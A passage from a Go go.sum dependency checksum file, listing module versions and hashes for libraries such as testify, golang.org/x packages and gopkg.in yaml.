h1:yWOB1SBYBC5VeMP7gHvWumXLIWorT60ONWic61uBYv0= 103 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= 104 | github.com/stretchr/testify v1.2.2/go.mod h1:a8OnRcib4nhh0OaRAV+Yts87kKdq0PP7pXfy6kDkUVs= 105 | github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI= 106 | github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4= 107 | github.com/stretchr/testify v1.5.1/go.mod h1:5W2xD1RspED5o8YsWQXVCued0rvSQ+mT+I5cxcmMvtA= 108 | github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 109 | github.com/stretchr/testify v1.7.1 h1:5TQK59W5E3v0r2duFAb7P95B6hEeOyEnHRa8MjYSMTY= 110 | github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 111 | github.com/syndtr/goleveldb v1.0.0/go.mod h1:ZVVdQEZoIme9iO1Ch2Jdy24qqXrMMOU6lpPAyBWyWuQ= 112 | github.com/tcnksm/go-gitconfig v0.1.2 h1:iiDhRitByXAEyjgBqsKi9QU4o2TNtv9kPP3RgPgXBPw= 113 | github.com/tcnksm/go-gitconfig v0.1.2/go.mod h1:/8EhP4H7oJZdIPyT+/UIsG87kTzrzM4UsLGSItWYCpE= 114 | github.com/ulikunitz/xz v0.5.9 h1:RsKRIA2MO8x56wkkcd3LbtcE/uMszhb6DpRf+3uwa3I= 115 | github.com/ulikunitz/xz v0.5.9/go.mod h1:nbz6k7qbPmH4IRqmfOplQw/tblSgqTqBwxkY0oWt/14= 116 | github.com/yl2chen/cidranger v1.0.2/go.mod h1:9U1yz7WPYDwf0vpNWFaeRh0bjwz5RVgRy/9UEQfHl0g= 117 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= 118 | golang.org/x/crypto v0.0.0-20201221181555-eec23a3978ad h1:DN0cp81fZ3njFcrLCytUHRSUkqBjfTo4Tx9RJTWs0EY= 119 | golang.org/x/crypto v0.0.0-20201221181555-eec23a3978ad/go.mod h1:jdWPYTVW3xRLrWPugEBEK3UY2ZEsg3UU495nc5E+M+I= 120 | golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= 121 | golang.org/x/net v0.0.0-20180906233101-161cd47e91fd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= 122 | golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= 123 | golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= 124 | golang.org/x/net v0.0.0-20220111093109-d55c255bac03 h1:0FB83qp0AzVJm+0wcIlauAjJ+tNdh7jLuacRYCIVv7s= 125 | golang.org/x/net v0.0.0-20220111093109-d55c255bac03/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= 126 | golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= 127 | golang.org/x/oauth2 v0.0.0-20181106182150-f42d05182288 h1:JIqe8uIcRBHXDQVvZtHwp80ai3Lw3IJAeJEs55Dc1W0= 128 | golang.org/x/oauth2 v0.0.0-20181106182150-f42d05182288/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= 129 | golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= 130 | golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= 131 | golang.org/x/sys v0.0.0-20180909124046-d0be0721c37e/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 132 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 133 | golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 134 | golang.org/x/sys v0.0.0-20191008105621-543471e840be/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 135 | golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 136 | golang.org/x/sys v0.0.0-20191120155948-bd437916bb0e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 137 | golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 138 | golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 139 | golang.org/x/sys v0.0.0-20200909081042-eff7692f9009/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 140 | golang.org/x/sys v0.0.0-20200918174421-af09f7315aff/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 141 | golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 142 | golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 143 | golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c h1:F1jZWGFhYfh0Ci55sIpILtKKK8p3i2/krTr0H1rg74I= 144 | golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 145 | golang.org/x/term v0.0.0-20201117132131-f5c789dd3221/go.mod h1:Nr5EML6q2oocZ2LXRh80K7BxOlk5/8JxuGnuhpl+muw= 146 | golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= 147 | golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= 148 | golang.org/x/text v0.3.5/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= 149 | golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= 150 | golang.org/x/text v0.3.7 h1:olpwvP2KacW1ZWvsR7uQhoyTYvKAupfQrRGBFM352Gk= 151 | golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= 152 | golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= 153 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543 h1:E7g+9GITq07hpfrRu66IVDexMakfv52eLZ2CXBWiKr4= 154 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 155 | google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= 156 | google.golang.org/appengine v1.3.0 h1:FBSsiFRMz3LBeXIomRnVzrQwSDj4ibvcRexLG0LZGQk= 157 | google.golang.org/appengine v1.3.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= 158 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 159 | gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 160 | gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk= 161 | gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q= 162 | gopkg.in/fsnotify.v1 v1.4.7 h1:xOHLXZwVvI9hhs+cLKq5+I5onOuwQLhQwiu63xxlHs4= 163 | gopkg.in/fsnotify.v1 v1.4.7/go.mod h1:Tz8NjZHkW78fSQdbUxIjBTcgA1z1m8ZHf0WmKUhAMys= 164 | gopkg.in/tomb.v1 v1.0.0-20141024135613-dd632973f1e7 h1:uRGJdciOHaEIrze2W8Q3AKkepLTh2hOroT7a+7czfdQ= 165 | gopkg.in/tomb.v1 v1.0.0-20141024135613-dd632973f1e7/go.mod h1:dt/ZhP58zS4L8KSrWDmTeBkI65Dw0HsyUHuEVlX15mw= 166 | gopkg.in/yaml.v2 v2.2.1/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= 167 | gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= 168 | gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY= 169 | gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= 170 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 171 | gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b h1:h8qDotaEPuJATrMmW04NCwg7v22aHH28wwpauUhK9Oo= 172 | gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 173 | --------------------------------------------------------------------------------